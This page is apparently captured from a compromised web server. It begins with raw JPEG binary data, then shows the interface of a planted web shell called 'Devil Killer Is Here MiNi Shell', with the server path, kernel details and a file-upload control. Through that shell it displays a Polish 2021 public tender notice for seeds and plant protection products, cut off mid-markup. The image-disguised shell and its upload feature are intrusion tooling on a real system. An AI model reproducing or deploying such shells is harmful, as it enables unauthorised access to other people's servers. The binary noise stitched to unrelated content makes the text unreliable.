JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210528/0006840201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00068402 z dnia 2021-05-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa nasion oraz środków ochrony roślin do Zakładu Doświadczalnego w Kołudzie Wielkiej. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Instytut Zootechniki Państwowy Instytut Badawczy Zakład Doświadczalny Kołuda Wielka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000079728</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Parkowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kołuda Wielka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">88-160</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL617 - Inowrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">523513391</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">523513541</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">izkoludaprzetargi@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://izzd-koluda-wielka.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> jednostka badawcza </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> jednostka badawcza </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa nasion oraz środków ochrony roślin do Zakładu Doświadczalnego w Kołudzie Wielkiej. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-58e9840e-bfb0-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00068402</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zd-koludawielka.ezamawiajacy.pl. <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W przedmiotowym<br/>postępowaniuZamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania<br/>oświadczeń,wniosków, zawiadomień oraz informacji:a) elektronicznie na adres e-mail:<br/>izkoludaprzetargi@wp.plb)lub za pośrednictwem Platformy znajdującej się pod tym adresem:<br/>https://zdkoludawielka.ezamawiajacy.pl w zakładce „Pytania i odpowiedzi”.2. Oświadczenia,<br/>wnioski,zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty<br/>złożone wterminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu<br/>(godziny pracyZamawiającego: 7-15 w dni robocze). Za datę wpływu oświadczeń, wniosków,<br/>zawiadomień orazinformacji przekazywanym na adres e-mail Zamawiającego przyjmuje się datę<br/>dostarczeniawiadomości na adres e-mail Zamawiającego. W przypadku skorzystania z Platformy za<br/>datę wpływuoświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich<br/>złożenia/wysłania naPlatformie - https://zd-koludawielka.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ogólne<br/>zasady korzystania z Platformy, z zastrzeżeniem pkt VIII.7 niniejszej SWZ:<br/>1) Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie<br/>https://zd-koludawielka.ezamawiajacy.pl<br/>lub https://oneplace.marketplanet.pl.<br/>2) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony<br/>https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do<br/>założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego;<br/>podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”.<br/>3) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający<br/>zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w<br/>postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma<br/>informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się<br/>pod numerem telefonu podanym w ww. potwierdzeniu.<br/>4) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja<br/>między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje,<br/>przekazywane są w formie elektronicznej za pośrednictwem Platformy w zakładce "Pytania i odpowiedzi". Za datę przekazania zawiadomień oraz informacji przyjmuje się ich datę wczytania do<br/>Systemu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:1. Administratorem Pani / Pana<br/>danychosobowych uzyskanych w związku z przeprowadzeniem niniejszego postępowania i realizacją<br/>umowy,która będzie zawarta w wyniku jego rozstrzygnięcia jest INSTYTUT ZOOTECHNIKI -<br/>PaństwowyInstytut Badawczy Zakład Doświadczalny Kołuda Wielka, Kołuda Wielka ul. Parkowa 1, 88-<br/>160Janikowo, tel: +48 52 351 33 91, faks: +48 52 351 35 41 lub 48 52 351 33 94, email:<br/>izkoludaprzetargi@wp.pl, strona www: www.izzd-koluda-wielka.com.pl;2. Inspektorem ochrony<br/>danychosobowych u Administratora jest Rafał Andrzejewski, e-mail: iod@izoo.krakow.pl;3. Pani / Pana<br/>daneosobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c i b RODO w celu związanym z<br/>niniejszympostępowaniem o udzielenie zamówienia publicznego i realizacją umowy, która będzie<br/>zawarta wwyniku jego rozstrzygnięcia;Oznaczenie sprawy: 5/2021Specyfikacja Istotnych Warunków<br/>Zamówieniaw przetargu pn.: Strona 14 z 37„Dostawa środków ochrony roślin do Zakładu<br/>Doświadczalnego wKołudzie Wielkiej”.4. Odbiorcami Pani / Pana danych osobowych będą osoby lub<br/>podmioty, którymudostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust.<br/>3 ustawy z dnia29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2017 r. poz. 1579 i<br/>2018);5. Pani / Panadane osobowe związane z postępowaniem o udzielenie zamówienia publicznego<br/>będąprzechowywane, zgodnie z art. 97 ust. 1 uPZP, przez okres 4 lat od dnia zakończenia<br/>postępowania oudzielenie zamówienia, a dane związane z zawarciem umowy w sprawie zamówienia<br/>publicznego orazjej wykonaniem przez okres, w którym Zamawiający jest zobligowany do ich<br/>przechowywania iarchiwizacji, zgodnie z przepisami szczególnymi;6. Obowiązek podania przez<br/>Panią/Pana danychosobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym wprzepisach uPZP, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego;konsekwencje niepodania określonych danych wynikają z uPZP;7. W odniesieniu do<br/>Pani/Pana danychosobowych decyzje nie będą podejmowanew sposób zautomatyzowany, stosowanie<br/>do art. 22RODO;8. Posiada Pani/Pan:1) na podstawie art. 15 RODO prawo dostępu do danych<br/>osobowychPani/Pana dotyczących;2) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana<br/>danychosobowych, przy czym skorzystanie z tego prawa nie może skutkować zmianą wyniku<br/>postępowania oudzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z uPZPoraz nie może naruszać integralności protokołu oraz jego załączników.3) na<br/>podstawie art. 18 RODOOgłoszenie nr 2021/BZP 00015144/01 z dnia 2021-03-092021-03-09 Biuletyn<br/>Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym<br/>na podstawie: art. 275 pkt 1 ustawy - Dostawyprawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniemprzypadków, o których mowa w art. 18 ust. 2<br/>RODO;4) prawo do wniesienia skargi do Prezesa UrzęduOchrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Panadotyczących narusza przepisy RODO;9. Nie<br/>przysługuje Pani/Panu:1) w związku z art. 17 ust. 3 lit. b, dlub e RODO prawo do usunięcia danych<br/>osobowych;2) prawo do przenoszenia danych osobowych, októrym mowa w art. 20 RODO;3) na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzaniadanych osobowych, gdyż</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:1. Administratorem Pani / Pana<br/>danychosobowych uzyskanych w związku z przeprowadzeniem niniejszego postępowania i realizacją<br/>umowy,która będzie zawarta w wyniku jego rozstrzygnięcia jest INSTYTUT ZOOTECHNIKI -<br/>PaństwowyInstytut Badawczy Zakład Doświadczalny Kołuda Wielka, Kołuda Wielka ul. Parkowa 1, 88-<br/>160Janikowo, tel: +48 52 351 33 91, faks: +48 52 351 35 41 lub 48 52 351 33 94, email:<br/>izkoludaprzetargi@wp.pl, strona www: www.izzd-koluda-wielka.com.pl;2. Inspektorem ochrony<br/>danychosobowych u Administratora jest Rafał Andrzejewski, e-mail: iod@izoo.krakow.pl;3. Pani / Pana<br/>daneosobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c i b RODO w celu związanym z<br/>niniejszympostępowaniem o udzielenie zamówienia publicznego i realizacją umowy, która będzie<br/>zawarta wwyniku jego rozstrzygnięcia;Oznaczenie sprawy: 5/2021Specyfikacja Istotnych Warunków<br/>Zamówieniaw przetargu pn.: Strona 14 z 37„Dostawa środków ochrony roślin do Zakładu<br/>Doświadczalnego wKołudzie Wielkiej”.4. Odbiorcami Pani / Pana danych osobowych będą osoby lub<br/>podmioty, którymudostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust.<br/>3 ustawy z dnia29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2017 r. poz. 1579 i<br/>2018);5. Pani / Panadane osobowe związane z postępowaniem o udzielenie zamówienia publicznego<br/>będąprzechowywane, zgodnie z art. 97 ust. 1 uPZP, przez okres 4 lat od dnia zakończenia<br/>postępowania oudzielenie zamówienia, a dane związane z zawarciem umowy w sprawie zamówienia<br/>publicznego orazjej wykonaniem przez okres, w którym Zamawiający jest zobligowany do ich<br/>przechowywania iarchiwizacji, zgodnie z przepisami szczególnymi;6. Obowiązek podania przez<br/>Panią/Pana danychosobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym wprzepisach uPZP, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego;konsekwencje niepodania określonych danych wynikają z uPZP;7. W odniesieniu do<br/>Pani/Pana danychosobowych decyzje nie będą podejmowanew sposób zautomatyzowany, stosowanie<br/>do art. 22RODO;8. Posiada Pani/Pan:1) na podstawie art. 15 RODO prawo dostępu do danych<br/>osobowychPani/Pana dotyczących;2) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana<br/>danychosobowych, przy czym skorzystanie z tego prawa nie może skutkować zmianą wyniku<br/>postępowania oudzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z uPZPoraz nie może naruszać integralności protokołu oraz jego załączników.3) na<br/>podstawie art. 18 RODOOgłoszenie nr 2021/BZP 00015144/01 z dnia 2021-03-092021-03-09 Biuletyn<br/>Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym<br/>na podstawie: art. 275 pkt 1 ustawy - Dostawyprawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniemprzypadków, o których mowa w art. 18 ust. 2<br/>RODO;4) prawo do wniesienia skargi do Prezesa UrzęduOchrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Panadotyczących narusza przepisy RODO;9. Nie<br/>przysługuje Pani/Panu:1) w związku z art. 17 ust. 3 lit. b, dlub e RODO prawo do usunięcia danych<br/>osobowych;2) prawo do przenoszenia danych osobowych, októrym mowa w art. 20 RODO;3) na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzaniadanych osobowych, gdyż</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">11/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa nasion rzepaku ozimego, odmiana Excited, hodowca Dekalb </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03111000-2 - Nasiona</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">63 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">98,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa nasion rzepaku ozimego, odmiana PX 113, hodowca Pionier </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03111000-2 - Nasiona</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">63 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">98,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa nasion rzepaku ozimego, odmiana Ambasador, hodowca Limagrain </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03111000-2 - Nasiona</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">63 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">98,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa nasion na poplon </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03111000-2 - Nasiona</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">63 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span 